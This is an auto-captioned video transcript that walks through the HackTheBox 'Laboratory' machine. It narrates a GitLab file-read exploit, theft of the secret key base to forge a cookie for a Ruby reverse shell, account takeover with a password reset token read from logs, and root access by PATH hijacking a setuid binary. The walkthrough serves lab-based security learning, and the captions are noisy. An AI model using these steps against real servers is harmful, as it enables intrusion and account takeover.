Gitlab LFI to RCE - HackTheBox "Laboratory"

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hey everyone before we dive into this video i just have two things to say first of all hack the box sent me this wonderful swag bag so i got a cool shirt i got a cool t-shirt i got a cool sweatshirt i got a cool like mouse pad i got a cool hat everything uh and i just wanted to say thank you and uh i really don't give a hack the box as much love as i should so what are we doing today what are we doing some hack the box and i want to shower them with love because thank you guys thank you so so much uh and on that note bringing me to point number two i wanted to bring your awareness bring your eyes over to the cyber apocalypse ctf 2021 that hack the box is doing super duper soon check it out so the back story here is ready to save the world uh the 22nd of april is international earth day and guess what the earth was hacked by malicious extraterrestrials their ultimate plan is to seize control of our planet it's only you who can save us from this terrible fate it's going to be a five day game so five day capture the flag starting on monday the 19th of april which is coming up uh friday all the way to the end of the week they're ending friday the 23rd and there is a team game max of 10 hackers awesome 5 days should be from beginner to intermediate so a lot of kind of accessible content here new content uploaded every day so they're going to be rolling stuff out jeopardy style game and it's coming up quick here's the countdown ladies and gentlemen at the time of recording we are just under two days away and you can register here by clicking that count me in button but check out the prizes for this thing it's put together by hack the box in crypto hack so if you haven't checked out cryptohack.org they have phenomenal cryptography challenges i really want to make some videos for you crypto heck but i know you have like a rule like anything that's over like 40 points or something it's not allowed to do so hey hey hey hey um but these prizes are stinking fantastic and incredible it's open to everybody which is great and every challenge that gets at least one solve hack the box will be making a donation to code.org so i love that that's stinkin awesome code.org is a non-profit organization dedicated to expanding access to computer science education increasing participation by young women and students from underrepresented groups that's all great stuff so hey kudos to you guys thanks for doing that that's incredible obvious great excellent top-notch hacking content this is kind of the challenges category stuff that you're going to expect to see some really good ones in there you got hardware you got blockchain that's uh that's not normally what you see but it's good stuff look at these prizes vip stickers merch swag vip plus academy cubes and 1500 us dollars in cash and a hundred dollars worth of hack the box swag card and hack the box stickers manual vip plus and a thousand academy cubes this is unreal uh so i would recommend really go go check that out look look huge numbers thrown across the board good stuff check it out if you want to go register you totally should we got about two days until the game starts go to ctf.hackthebox.eu create an account credit team and join the cyber apocalypse ctf i'll showcase that real quick here um actually i don't have this lastpass configured to this virtual machine it's not set up in firefox so i don't know if i can actually log in but if you were to log in type in your cool like lead hacks or username and then you do it and then you do it and you click on you click on cyberapocalypse.ctf sign up today it's totally free and it's gonna be a ton of fun like obviously they've got support in the discord server it is on ctf time which is big and uh that's it that's enough of me yapping about that but hey that should be a ton of fun and uh kudos kudos to you guys for putting on an incredible game i think there are what like 4 000 folks registered now so should be a huge game and you should dive in okay hey let's do it let's do the real video now now that i've kind of yapped for four minutes but i really wanted to get that on your radar and now let's dive into some actual hack-the-box content um that i want to showcase this is going to be the laboratory machine or laboratory i would kept i kept typing it without an o and laboratory and then everything was wrong i was like literally mistyping the hostname over and over and over again uh disclaimer i am not smart this is an easy room although i think some of the user writings brought it up to about medium and uh i would say medium seems a little bit more fair to me like look i was struggling and i say i'm not smart because like i can do easy rooms sometimes not really not really all that often i still struggle with the easy easy boxes the easy machines but i had to do some digging and i was banging my head against the wall for this one so i wanted to walk you through my thoughts bring you down every rabbit hole that i went down and hopefully we can get some good learning lessons out of it but i think that's a fine time to transition and let's go to the screen all right so i am over here inside of the hack the box interface which is looking slick if i may say i love kind of the new design here you can see that laboratory is the machine that is retiring at the time recording so i wanted to get this out here and the ip address is 10 10 10 to 16. i have the deployed the machine it's up and running in the range i've connected the vpn and i have already gone through this so uh i gotta let you know not going through it live i do have the hindsight 2020 thing but uh hopefully we can still showcase some some some good stuff so i have a terminal with my hack the box little uh vpn key that i am already connected but i do need to make a new directory for laboratory with an o there and uh let's hop into that and let's go ahead and take a look at that ip address which we know is 10 10 10 216. so we get started with an nmap same thing we always do i'm going to go ahead and create a directory for nmap so i can save all my things in there and i will use nmap tac sc for default scripts tack sv to enumerate versions tack o n to output in just the nmap format and i'll call it initial i will actually tack in a little dash v there for verbose so i can kind of see everything as it comes by and we'll add in that ip address 10 10 10 to 16. all right there we go looks like it's gonna get started and immediately find some ports 22 likely for ssh 443 https and 84 depaul excuse me default http like a kind of flat classic web server here but it does have https which is good to note so i have some results here and i'm actually going to open that up in sublime text so it's a little bit more readable you can see we do have port 22 open that ssh as we mentioned port 80 in here and i would immediately just kind of want to start to run and go look at that web server uh now i missed something going through this because i did just that looked at port 80 and wanted to explore the web service and i didn't fully read probably what i should have out of this 443. originally i actually ran this with rustscan which was good because i was coming kind of moving quick but it didn't end up doing all the same scanning that this command would have done with tack sc tac sv etc so i'm going to uh avoid that elephant in the room for the moment just for suspended disbelief and drive us down the road of looking at just this web page which is that 10 10 10 2 1 6. now this redirects us to laboratory dot htb and as we could tell kind of from that nmap scan results it does redirect us to this specific domain so we need to add this domain name laboratory.hdb into our etc host file so let me do that real quick i'll just use nano kind of on the command line here so that way i can trigger all of you vim fanboys all your emacs fanboys everyone that doesn't use nano uh 101010216 and it is laboratory.hackthebox donzo okay so now reaching back to this address here it brings us and redirects us to https now this is something that is worth noting because it has a certificate set up for it and we should probably do our due diligence and actually go look through that certificate hey what is actually in the mix what does it do etc again in the moment that's something that i just sped right past so we're greeted with the laboratory security and development services kind of a nice little web page here laboratory provides high quality security and development services at a low price point and there's some boilerplate stuff in here identity management secure development cryptography services i like the memes in here we all know great crypto like rot13 and base64 hey that's that's all i know that's great crypto to me threat hunting cool red teaming and everything that i seem to find here is a link back to nothing we got testimonials from dexter from dede from anonymous hacking this guy's a good hacker but he's also a good coder it's like magic you never get that combo and uh so yeah like hovering over the blog or the coming soon hopefully links or even these socials they bring us to just a thor little hashtag so an internal link that doesn't go anywhere and there's a funny note hey if you find a vulnerability in this website then you're totally lying we could 100 secure and i'm sure you can't hack us if you do definitely don't let us know nice so yeah even literally just viewing the source on this like i hit ctrl u on my keyboard you could right click and view source this is all just going to internal stuff going to static pages in css out of the assets folder using some kind of cheesy boring javascript that should just come from the theme and the display the web page itself these elements that are commented out those little elements.html or generic.html maybe these would be links so i tried to go to them but that returns a little 404 for us so that wasn't really all that helpful and there wasn't anything really else to look through i went to go take a look at that images folder and that assets folder in case there was anything interesting other than those static files that it might end up serving out but no we weren't getting any easy wins for this easy box with our easy smooth brain right now so that didn't seem to work for us i was kind of banging my head against the wall here i would fire up nikto i'd fire up go buster and i would do some stuff but i really should have taken a little bit more of a better look at this certificate because if we actually take a look at this thing i'm pretty sure this will end up telling us hey we actually have another subdomain in here not only do we have laboratory laboratory.htb but you also have a alternative name git.laboratory.htb ah so that again of course is another domain name that we need to kind of add into our etc hosts file so let me go do that duplicate that line here add in that git prefix cool and as i mentioned if we were actually reading the output of what our tools gave us we would notice that hey they actually have that right here in the nmap results we have a dns other entry here git.laboratory.htb so what are we going to begin what are we going to be looking at if i were to go to git dot laboratory.htv again another kind of certificate warning totally cool let's breeze right by that but we're greeted with git lab a gitlab community edition and immediately i'm like what do i do i don't know any username or password like i could try the stupid admin admin i could try the stupid admin password i could try the obvious answer every single time um but that still didn't get me through the door so i thought well can i just register an account i'm like yeah all right i'll create a test user test test at test.test.com and username is already taken probably because this instance that i run through is still live so let's just call this john let's do john john.com how about that john john.com and the password minimum length is eight characters so uh i just use password anything although there is an error the email domain is not authorized for sign up which i mean i guess makes sense john.com isn't exactly a thing um but maybe this is kind of a neat little gimmick they want us to use laboratory dot htb and again i'll add the password anything so that will log me in all right welcome you've signed up successfully super cool here we are here we are in gitlab i don't have any projects um if i were to take a look there any starred projects or i can explore projects and this is actually interesting we ran into dexter macpherson their secure website repository 100 unhackable html and css based website um i would take a look at this and i noticed there was only one commit so there wasn't a whole lot really to dig through and it was all these static files that we originally saw when we were looking at the web page so that was basically useless i wanted to check just in case like just in case they were kind of sneaking anything in if they're anything were different from this version the repository version and maybe the live production version but no it all seemed to me to be the very very same and i was cruising through the assets and images directory but nothing was there so okay um at that point i was starting to think like all right well we've we've got a gitlab instance it is not uncommon for us to have if there's some accessible like program solution right whether it's a cms whether it's git lab whether it's another utility that's known out in the world uh that's public are there any potential cves or publicly known vulnerabilities for this thing that could be exploited and could get us a little bit more access so when we're looking at gitlab i want to specifically know the version of git lab that is running the way you could track this down hey we're kind of logged in thankfully we are authenticated because we can register a user but over this little question mark here there is a help drop down and that help drop down will straight up tell us yo this is git lab community edition 12.8.1 so i'm like all right that's great now we know the software name gitlab right and we know the software version number 12.8.1 though that will help us narrow our search especially if you are hey trying to work on oscp if you're trying to work on any sort of certification exams that is testing your ability to look up and find and research vulnerabilities for a specific software those are the two ingredients that you might really need then we can search through exploitdb or the exploit database and see if there are any known vulnerabilities for this sort of thing i will use search split which i actually have kind of set up as uh inside of my exploit database repository that i've cloned and actually as a good thing to do when you're doing this try and just pull down like and update your repository same thing goes for running metasploit with the msf console make sure you run msf update before you're going to fire something off because if you're doing research and you're looking for a new low-hanging fruit you're looking for a new vulnerability you're looking for a new exploit you might be able to throw maybe something new was added so it's always a good thing to remember hey go update search blight go update msf console metasploit and do all that so let's run search split looking for git lab just simply searching for the word in the string gitlab so i've got some good stuff that immediately pops up get lab impersonation maybe privilege escalation um doesn't have a version attached there 11.47 rce authenticated that's a little too old for us 11.47 remote code execution 12 12.9.0 arbitrary file read and 12.9.0 arbitrary file read uh i'm assuming that's going to end up being authenticated i'm zoomed in a little bit too much to showcase that there we go and there's a metasploit module supposedly ah okay um well let's take a look at some of these because the 12.9.0 is interesting to me because at 12.8.1 now there is no guarantee when we make this logical conclusion right that a version number that is higher is known to be exploitable uh maybe that vulnerable code was only introduced in that specific version so maybe it's specific in just that 12.9 but there is the case hey maybe that code existed before it wasn't patched until this version so maybe potentially this could read gitlab less than 12.9.0 so anyway let's go ahead and take a look at what this thing is there is an explanation with a dot text file and there is a four nine zero seven six stop python file uh and there's a metasploit module so maybe that would be worthwhile to look at but first let's play with this code here to kind of get an understanding as to what this exploit does and how it works so i will hop back over to my directory for this guy and i'll make a directory exploit i guess and i'll use search exploit tac m to mirror that or bring that file in here there we go now it's present in this directory and again i'll use sublime text to open this up exploit title everything we've already read google dork back in 2020 um version tested on gitlab version 12.9.0 you can create as many personal access tokens as you'd like from your gitlab profile sign in to gitlab in the upper right corner clicking your ad okay do we need to create a token for this to work i guess so oh we need to install git lab and requests gitlab's like little api tool oh and you it would specify a cert here with the session object that's created from requests or you could set session verify to false let's do that because i don't actually have a copy of the cert and then it runs exploit little function do we have to supply the host it doesn't look like it takes arguments what do i do with this exploit takes in a project name issue title files and tokens and it creates an issue no creates a project creates two projects and an issue and moves it okay but in the main function we have write files with sensitive files what that's opening it out locally on my machine and it calls exploit the token isn't even passed in it doesn't pass in the token that's needed i'm assuming that's needed what is the script does this work oh gosh is there something weird going on what's up with these spaces that aren't spaces some of those just straight up aren't spaces let's replace all those of the space indentation oh god these things have extra spaces now how about that no module named gitlab oh my gosh pip has kind of been like weirdly slow for me when it's trying to download stuff i don't know why uh i'm gonna pause the recording just to uh see if i can let that thing go all right gitlab is here we made it we installed gitlab with pip now let's run this again and it doesn't have that sensitive files um what is that supposed to be like is that supposed to be something that i want to read exploit's missing the token yeah i don't get this script i don't i'll be honest i'm not exactly positive how this is kind of supposed to work through it all and i don't want to end up creating a gitlab token i mean like i will if i'm supposed to but like how does this work how does this what is the cve for this thing is there a cve for this thing is there more research and reading that i can do let's google this xydb exploit db here's a little facebook entry this is this is a link back to facebook i don't know how i want to go to that one what is this showcase ah get out of here no never mind never mind we're not going to facebook um this is the very same one that we just pulled down yep from exploitdb this one has a lot more to it um it logs in with their username and password grabs the csrf token yeah yeah okay maybe that one will be worthwhile what's this github one github oh oh they tested it on our exact same version gitlab 12.81 in a recent engagement i found a gitlab instance on the target i found a proof of concept on xbytb that uses ldap authentication was disabled in this case so i created this python script which i thought using the web gui two projects an issue in one of the projects with the malicious payload that moves the issue from one project to another automatically read the file contents ah oh this is kind of nice it asks for the absolute path that you want to read it will write it okay nice let's play with this then yeah let's use this i'm just gonna open this up in raw and slap this into like a little exploit dot pi okay um reading through this because i don't want the internet to get mad at me for just blatantly running code that i ripped off the internet without reading it doesn't look like it's going to delete any files so obviously totally safe i'm just kidding i'm only half king let's go ahead and run this uh spython no no let's run python3 exploit uh with the username url url username and password okay so we need https uh git dot laboratory dot hack the box john and password is anything yeah yeah okay logged in nice um absolute path to file let's see if we can get can we get a set of password well is this going to be like local file inclusion and readout etcetera password it did the thing so root user of course i'm looking for users that are like non-standard or would have a user id like uid over a thousand because those are probably going to be a regular user maybe they have ssh keys or something that i could read but i don't see any of those just get lab get lab get lab get lab stuff 996. none of those would likely have a these these have like these have a shell bin sh but their home directory i doubt would have actually like a an ssh key installed let's try it again let's try and get like their home directory ssh id rsa nope am i like for whatever reason running is root can i just read it set reshadow probably not no access denied okay so that's not exactly helpful um okay what do i do with this then i have local file inclusion could we like look at logs i would want to do like a log poisoning like a cache log poisoning thing but it's not going to end up running or evaluating that code um how could we take this local file inclusion and bring it to rce remote code execution did they talk about anything else like in this post what did you do for your engagement the white hat white hat hacker what do you got here dependencies usage are there any examples no just credits thank you to vax for finding this bug in git lab pretty sure i've seen vax in like the open to all ctf team the hacker one report oh cool oh cool this is like the legit disclosure that's like the legitimate finding back on hacker one that's kind of that's kind of slick 20 000 okay boys what are we doing what are we doing on youtube doing we i need i need to jump in this bug bounty bandwagon uploads rewriter is the issue allowing arbitrary files to be copied what a cool bug oh there's a video showcasing this file read let's check this out this is just a proven concept for like reading the file though isn't it yeah he moves it to another project my face is in the way i'm very sorry he just moved it to a different project and then there's the detachment for password which if he were to open up is etc password slick okay he did it and etc etc etc gitlab's like thanks thanks for submitting this yep nice that's awesome it's also possible to turn this into rce as the cookie serializator is set to hybrid by default this can be done by first grabbing the secret key base from opt to gitlab embedded service gitlab railsconfig secrets.yml uh and then using arbitrary file read now using the arbitrary file read read from this file right and then use the experimentation subject id cookie with the marshalled payload payload can be generated by changing your own gitlab instances secret key base to match then running the following in a rails console there's all this code here okay and then there's a little inject as to what commands you want to run and you just send it with curl that's slick it's executed okay okay well let's get that secrets file um let's run that exploit again let's pass in this opt gitlab embedded service gitlab rails config secrets.yml pull that down and okay get a lot of stuff looks like a private key okay that's for open id connect signing key so it's not going to be like an ssh key let's copy all that and just save it out because the secret key base is present here nice um let's take note of that let's do a secrets.yml what's that called secrets secrets with with an s plural slap that in and we have our secret key base so that should be something we should keep in mind okay um now we would need to marshal this set up this payload this can be done first by grabbing so this says i needed my own gitlab instance can i get like a git lab in docker get lab 12.8.1 community ce and docker that's the thing yeah gitlab gitlab ce i mean okay it does it how do i use it it's a thing that exists is there anything that like showcases this what do we google we get we googled for gitlab arbitrary fall read let's bring it to rce whitehead hacker has something rapid seven has something oh is this the metasploit thing is this what this metasploit module would do let me just experiment real quick let me just see if the metasploit module will work for us uh so let me do that msf update please walk the talk talk the how do you say not just talk the talk but really walk the walk as to what i'm saying here let that run with msf update and let's see what else we can get vimeo oh there's a video on this thing video hacks um i don't think there's any issues with me playing this so let's let's go do it let's see what he does i think wait wait wait oh he set up he set up a docker thing this is super hard to read and i don't know if you can actually see it docker run rmd hostname gitlab and they're using that specific version let's can i steal that can i grab that syntax i should have created like a readme file i know i would never use it but it's just for like the novelty um syntax docker run tactic rm tag d tact host name uh gitlab they use vh i'll use like jh for john um ports 443 443 8280 so it's mapping the docker container ports to my local machine host and ports that i can actually access um 222 nx access ssh the name of the container can be git lab and then it should be git lab git lab tax ce 12 and this this is just the image name that we just saw in that docker hub when we were googling so get lab ce 12.8.1 whoa 78.1 uh ce dot zero is that a thing is that right will that work let's see if i can do it is something going wrong with metasploit maybe we don't need it well let's put that away we'll let let's do its thing and i'll see if we can get this docker thing to it to work for us doesn't actually have that image so right so it's got to pull it down totally fine and take a little bit and get lab is usually slow i think uh i just want to check this video so they start recording this at 11 17 and then they start their docker instance and then they go back to the web page at 11 23 i thought i saw for a second there yeah 11 23 and then 11 35 so they can finally refresh it and actually interact with this gitlab instance so that's going to be waiting for a while they log in they create this account they have the other repo so they can do the proof of concept to read local files yep okay i see them with etc password and then they pulled out the secrets file okay so they get their secret key base um and then they jump into the container docker exec ti it get lab bin bash load it up with git lab rails console and okay okay and then they can mess with it but they don't need they haven't changed the secret key base on their instance because they're just testing it on their instance but they are running the exact same commands that we saw in that original disclosure so okay can we do that exact same thing docker is still pulling it down there we go now we have it is that actually running i see git lab my i'm zoomed in way too much here i'm sorry docker ps git lab is running with git lab okay so let's see if i can get into this um bin bash should be at the very end and gitlab the container should be what we wanted to okay cool so now i'm in that container can i see i want to give this a little bit i want to give this a little bit to set up because it might be still building i want to see if the secrets file has like kind of been generated or created already hacker one i'm way too zoomed in let's grab this secrets file and let's actually slap this into a readme so we can refer to it later um does this file exist it does okay but it's going to be different because this is our local instance this is our own kind of our clone and our dummy testing to see if we can marshal some of the data but we might need to actually configure the secret key base how do i do that set the secret key base get lab community just google it around application secrets secrets where secrets are stored omnibus etc get lab get livesecrets.json is that a thing i just see this file path here and part of me is wondering if that is that's kind of what i need or not let's grab that because so i could just straight up nano the secrets.yml file like i could edit this manually but it does give us this warning hey this file's managed by gitlabctl manual changes will be erased to change the contents below edit gitlab gitlab and run pseudo gitlab ctl reconfigure so i don't know if it'll stick the way that it should so let's nano that secrets.json and okay i see gitlab rails is here with that same sort of config but we need to grab the secret key base that's present on the target so i'm gonna nerf this paste that in replace it with kind of the target their secret key base and then let's try and run that gitlab ctl reconfigure command that they suggested and let's see if this comes together it's slow i can't tell if it's still like setting up the instance and everything gosh all right i'm going to wait on this i'm going to let this go and let's see did metasploit actually come back at all it just died whatever see about what excuse me oh hey are our reconfigures working down there can i run msf console please what what if i sudo this thing i know it's weird to like run okay i broke metasploit that's fine no i can deal with that later i suppose gitlab is reconfigured down in our docker instance though so let's see what we got um now i want to check out the secrets file it has not been changed because our secret key base is different did i do that wrong or did i oh i don't have less i'm in the docker container right yeah that's still not that's still not right what happened to our json file um let me nano that is that the right that's not what happened i'm going to reconfigure all of these just to be safe about it or just to be like kind of anal about this thing so the db key base we can change slapping that in the otp key base let's slap that in oh shoot i did not include i did not get in the middle of my string quotes um and now we need to actually get that private key in here oh that's going to be a pain because it has new lines and it's all kind of jotted into one line actually we might be able to do that with some sublime text magic i'm going to take this entry and then bring it into it bring it into its own document uh d-dent it here and let's have python just create this as a multi-line string yeah so now viewing that out and it's kind of like raw mode returning it out it has the new line characters in here all for me so i can copy that and that's done easy peasy all right so theoretically that will work let me make a copy of that just to verify uh what do i just edit i just edited the json file so let's copy that into like temp hours.json and let's run that reconfigure i suppose hopefully maybe if not we can just kind of try it and see if we get anything um just to validate like like the rce or the command code would work but we'll see we'll see if this works reconfigured now let's check out our yml that looks perfect okay great the 323 is kind of what i wanted to see so that video ran this in get lab rails console right see if this ever comes back but we have the syntax for what we should run here in this right here okay i could put this in our inner read me again but gillebral's console is taking his sweet time i'm spooked we have to keep in mind though we're likely on the target running inside of a docker container because we didn't have any users in there when we looked at etc password and if we're in a docker container we're probably in something that is just like this docker container which means that we probably don't have like netcat or ping or python so we know we're gonna have ruby right because the git lab rails ruby i mean that's rails is gonna end up being written in ruby so maybe yeah we're literally in a ruby interpreter so maybe we could try like a ruby reverse shell now i'll add the disclaimer like this is where i was tripping over myself repeatedly because i wasn't thinking and that is when i had to uh i would try to ping i would try to netcat and i wouldn't get a call back um but then later when i did something else i ended up simply noticing and seeing the error messages like hey that command is not found it's not actually retrieving anything it's not able to execute that so ruby i think would work and ruby i think did work so i'm gonna use no sh so we aren't depending on a uh i should really put this in the stinking actually i can just throw it in here can i but i need to make sure that these double quotes are escaped out because this isn't a string on its own double quotes let's double quote that or escape that escape that there's an if with a string there and also remove or escape out the double quotes on failed yeah okay so now i need to know my ip address though um let's get out of this one and i am 14 25 so slap that in cool and rather than this little proof of concept let's see if that will actually execute for us uh let's set up a listener netcat attack lnvp 9001 and i'm going to be [Music] kind of anal about this and just copy these commands in one by one just to like see what happens just to kind of know what goes down so in gitlab console let's grab the request object request environment check out the cookies and now let's add in this whole long line to create our ruby command set as a string or object and then define it oh and that actually gets connection okay from our testing thing oh okay that's that's a shell let's start up a shell um then let's try with the cookie it tries to run it again but it gets that connection refused because i'm not listening i wanted to see what this cookie looks like which is this output okay so now if i were to listen and take this whole cookie we could use that in the exact same [Music] kind of syntax and structure that they use with this curl command let's copy that and we need to change the location that this is going to because it's not going to go to a local gitlab vm it's going to go to the get.laboratory.htb and let's add attack k to ignore that certificate um let's grab this whole syntax to replace it with that big value and let's see going back to our terminal i am listening over here now let's try and run that curl command just by slapping it in and we get a connection and commands work okay okay awesome uh this is not a full shell this would not play well with pwncat because it's like this weird subshell thing out of ruby um we could try and stabilize this but i i don't think we have python we don't have scripts oh do we have script but right now we're in like the sub command of ruby which is really weird and messy um what do we have here i'm gonna look around this is the docker this is the docker environment that's super annoying um what else can we do that we could break we could try and break out of this docker environment we could try and get like deep ce in here but there's not going to be anything at home there's not going to be anything really worthwhile on this we could try and break out of the docker container we might be able to oh but i mean since this is git maybe there's something more in that dexter account like when we were looking at the other projects in the skit lab dexter has his thing maybe we could get into dexter's account is there a way to do that like we could probably track it down or find the secrets in here within the docker instance um gitlab change a user's password gonna that's really not gonna come up with anything useful can i [Music] maybe are there any secrets that would come out of this arbitrary file read that allow us to do that let me google this one more time and then maybe like change password pakistan oh exploiting cve the cve that we saw for a default gitlab installation there are a couple such files is the what yeah i guess we don't know the username of that dexter or that admin account supposedly but this is showcasing the same thing that we've used thus far oh but that does have a section over changing users password they use python gitlab okay and that's how they do that's how they do the same thing originally the same vulnerability but production.log production.log what is production outlook that's new is there a full path for that where are they getting production.log production.log oh caleb rails okay the production.log file contains the reset password token values that are generated as a result of requesting a password change for a registered user these values can be used to drop a user's password ooh okay so can i read that let's go back to run our exploit script ah gang it um https get.laboratory.hackthebox john anything go great uh let's paste in that path to the production.log and it gets a lot of stuff okay so now what you could try and reset a built-in ads password if it left default admin example.com is that genuinely the default next i'll trigger a trigger a password reset for discovered users via the user's password new endpoint is that a thing um let's go back to the get here users password new i'm already signed in do i have to sign out to be able to do that users password new okay and then the email we can try to see if we can reset the password for the default but maybe default admin password yeah okay okay so after doing that according to this thing next we can download production.log to extract that reset password token value oh okay so let me try that again oh shoot i lost the production value i lost that little uh file path slap that in and now we have a ton of stuff okay so again just going to copy and paste all this we could probably patch this thing like modify this script to actually give us something that you know will just write it to a file there's a lot of output here i will add the disclaimer um this instance is still running from when i was kind of messing with this previously and trying this kind of on my own so you can see that my attempts to run ping with that command injection vulnerability for the rce that we had just done or my attempts to run netcat uh and i think even in here will be the old reset password tokens so i need to be cognizant and we all we always want to be looking for that last reset password token because if that's triggered from us just making that request like we just did then it's going to end up being hey something that okay how much is sinking it's going to end up being the most recent one that we ran right so this is like from the very very top oh shoot jumped out of my vm for a second let's make this thing and this is going to be humongous and this is actually probably running it twice but let's look for that reset token reset password token what was that thing called reset password token reset password token those are all filtered let me go to the very very last one filtered filter filter filter oh no is it actually filtered are we not going to be able to see it what the heck what the heck what what what is it what are they tracking down what do they get reset password instructions reset i just looking at their reset password instructions let's go to the very very last one and now this i'm assuming is going to be the the key for us so that we could use to change their password so after we have that then we can go to users passwords edit with that token that's just stored in the logs so let's grab that get laboratory users password edit with that token let's see if we can actually hit that um and we can okay okay so let's change our new password um i will make that like password dope your password has been changed successfully okay so if we were to sign in admin example.com because it will take an email now our password is password can we log in yes all right okay so we have the secure website that we saw previously and we have secured docker confidential secure docker config for home server also some personal stuff i'll figure that out later personal stuff ooh as a dexter folder dot ssh okay okay there's a private key in here there's a private key in here we can work with this um let's copy this entire thing and this if if the user name is likely dexter right hey get out of here get out of here exploit um let's make a directory ssh subal dexter idrsa slap that in make sure the new line is there which is good uh let's make that 600 for permissions so that way it's actually going to play nicely when we try to use it with ssh dexter is likely the username as we can kind of indicate from seeing that either on the website and that folder in the repository uh laboratory dot hack the box always got to remember that oh we're in we're in we made it we got user.txt boom okay user.txt we could submit that this is now a retired room hopefully so retired machine for us here but now what do we do now we want a privesk dexter is seemingly the only user lxd is in here root is the only user do i have any suitor permissions uh we don't know his password damn it uh okay um any weird files something in opt container d not allowed to work in it okay it's owned by root how about in the root of the file system not in a docker container we don't have the docker env file but we could be like running lin peas or something or use pwncad if we wanted to you could actually connect to this ssh with phonecat let's look for some set uid binaries i guess do that kind of manually before we pull out the big guns there's a lot of snap in here um ssh keygen is kind of normal i think we see that a lot pulkit agent helper also d bus helper d snap confine password is normal mount is normal at is sometimes normal uh user local bin docker security what the heck is that that i don't think that's a normal thing that's not a command though it's not normally like a utility uh it was like a straight up there was a straight up like privilege escalation google quote maybe that's a thing so we could run we could run lin p's we could run lenina we could run any other automated script to detect stuff and truthfully i had like in the moment i was trying to understand okay um am i needing to get some other access within or without of the docker container because we did have access to that docker container i saw lxd was in here is my group am i in a group that allows me to do anything no i'm not in lxc or docker groups or anything like docker permission denied we could upload our own but it'll still kind of error um there wasn't a ton so uh i did eventually come to thought like oh i should try and run like peace buy because i wonder what's going on like when i was doing some my enumeration let me get back on the box here um i would check out ps aux to see like what processes are running or i would use netstat tac peanut um to see no netside is not installed so you could use like ss tac l or whatever but i saw a weird sleep thing being ran by lxd and the container d that we found in opt was just kind of odd it looks like a non-standard container d thing there's our reverse shell [Laughter] so i was wondering if there's anything else going on because what is running sleep like rude is running sleep why that makes me want to see what's happening on this file system do i actually still have piece by piece by piece by piece by i don't crap all right let's go get piece by piece by 64 please go go go let's do it let's do it um download save um let's get into opt move from my downloads that piece by 64 here good um i'm gonna run up dog just to spin it up uh if you haven't heard of updog it's really nice it's essentially god dang it what is up dawg and now we get into the the meme and the joke updog github is a replacement for python simple http server so if i were to try and go ahead and access this like localhost i think you put it on 90 90. pretty sure it allows uploading and downloading via http and https can set ad hoc ssl certificates uh so it's just a really handy up and down like file transversal thing yeah yeah see check it out it's like python simple http server but much better so now we can hop over to device hm i like to work out a shared memory let's w get do we have w get this i mean we're on an actual machine now so we should 10 10 my face is in the way 14 25 90 90. let's get piece by 64. 64. download that oh and it's actually everything's still in here from again me doing this earlier i'm sorry i'm truly sorry let's run peace by let's see what we got you can see sleep one is happening and out here and there's a pea grep for fl unicorn but those are all that 998 and that was one of the get values um i did notice cmd uid 0 where it's trying to do something as root and we'll see these every now and again but a ton a ton of sleep zeroes excuse me sleep one and i'm assuming this root might be coming from the container itself like this root command because we would still probably have visibility right on the docker container in the instance there but that's that i guess we can let that run we can let that keep cruising i'll zoom out on that to see if anything worthwhile comes by and let's actually get another shell going sorry my terminal just gets extremely messy as i do these things where did i put dexter ssh using that ssh directory ssh tag i checking over in that other terminal you can see that the container is still doing weird things ssh tack i home drawn ssi g rsa uh no no not my rsa i'm dumb i was just reading and my mind kind of went blank there dexter [Music] lobotomy dexter at laboratory.htb there we go they were logged in okay you can see me log in sorry um maybe we should tune back to that set uid binary we had uh we had lin p's right so let's go ahead and run lin p's and again i had just you could use updog or any of those methods that we had maybe netcat files back and forth or any other file transfer thing to actually get that onto this box um that's kind of what i had done previously and that's how i have a few of these in here so i will clean up my tracks but let's run lin p's i actually use a modified version of lin p's that doesn't check if there's internet connection because it just hangs because we know these hack the box machines don't have internet access so let's try and let that one go oh peace buy is gonna light up whoops whoops how this thing goes see if it tracks anything down lin pease is great because it has uh that legend in that key that lets you know what could be very very worthwhile to take a look at highlighted in red or bright red on yellow um we don't actually have a ton in here there's a boot file system set up along with our actual hard like slash we have python3 we have netcat we're on the actual machine here now but anyway nothing egregiously sticks out truth be told to get that um privilege escalation to get into the root user but it's checking out service files installed compilers this is kind of something that i just tend to do is like stare repeatedly at the i don't know what what snap is doing what these system files are doing something that i tend to do is repeatedly drown myself in the lin pease or lin enum output and just keep rereading it if i'm banging my head against the wall if i don't know where i'm going next i will just kind of keep looking is there is there anything here that's weird is there anything here that um is is likely there for a reason right so something that i always take a look at i'll let this go for just a little bit more but um i don't want to drag this on anymore than i kind of already have because i know we're kind of getting to uh the end of our attention span into my attention span that's for sure nothing sticks out nothing is nothing is immediately noticeable um when we get to the set uid binaries though they do a good job right because it's lin piece of showcasing the stuff that does stick out but you can't rely solely on that and that's kind of why i did that manual find tak perm tac 4000 to look for these set uid binaries without that color coding because the color coding all we're looking for all we're trained to look for is like the stuff that's bright red or the stuff that's going to jump out at us but i will quit beating around the bush i will kind of bring it home that user local bin docker security file that looked really weird is really weird and it it's non-standard i don't think i've ever seen a docker security binary maybe you have if you have please let me know in the comments if that's like a normal thing that's just trying to latch onto but it just doesn't so let's go actually stop let's stop lin pease and let's take a look at what this docker security thing is we know it's a set uid binary because that's how we found it but it's owned by root so it's weird and maybe we could abuse this thing maybe we could take advantage of it can we strings that oh we don't have strings well we could download this thing if we really wanted to um i would actually recommend you do that if you were connecting with pwncad or something or if you had an easy means to download we could use updog again just like curler posting it to it to get it onto our our own analyzing and attacker machine but we can also just kind of like gross cap the binary out and it will kind of still do the same thing for us we'll have a lot of non-printable characters but we will end up seeing some potential worthwhile strings in here uh some weird ones that i noticed was this chmod 700 user bin docker and chmod 660 var run docker part of me wonders is it just running those commands um because if it is maybe we could take advantage of that maybe we could latch onto that if this is a set uid binary uh user bin docker has its own like full absolute path here but chmod is not being ran with an absolute path here so maybe we could do some path hijacking with like our own path variable so i'll echo out the dollar sign path here and none of those sorry well have an extreme okay uh we know we're we're close to the end of the video guys where i keep clicking everything at random we don't have anything that might indicate okay chmod is going to run otherwise we can kind of get in the way of it we can get in the middle of this and have the system have the program once we were to run this user local bin docker security we can have that execute our own kind of poisoned masqueraded version of chmod rather than the real chmod command that's kind of the the idea behind do i have that actually anywhere did i leave a ch mod in dev shm and i was just being an idiot i did production quality professionalism you guys know me so uh if i were to do this in temp now let's create our own ch mod uh and i'll just make this a script i'll make it super dumb and super simple uh it'll just run bash maintaining like the set uid bit bash tag p that that's all i want that's all i need for me so i will mark this as a executable file so now when i run it 